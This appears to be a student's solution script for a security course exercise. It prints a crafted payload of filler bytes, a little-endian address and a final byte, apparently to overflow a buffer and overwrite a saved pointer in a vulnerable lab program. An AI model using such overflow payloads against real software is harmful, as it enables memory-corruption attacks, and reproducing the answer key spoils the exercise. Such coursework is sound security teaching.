#!/usr/bin/env python3

import sys

# Configure Python to print text strings like byte strings. Don't remove this!
sys.stdout.reconfigure(encoding='latin1')

### YOUR CODE HERE ###

print('F' * 4 + '\xbc\xff\xdf\xdf'+'F'*56+'\x50')
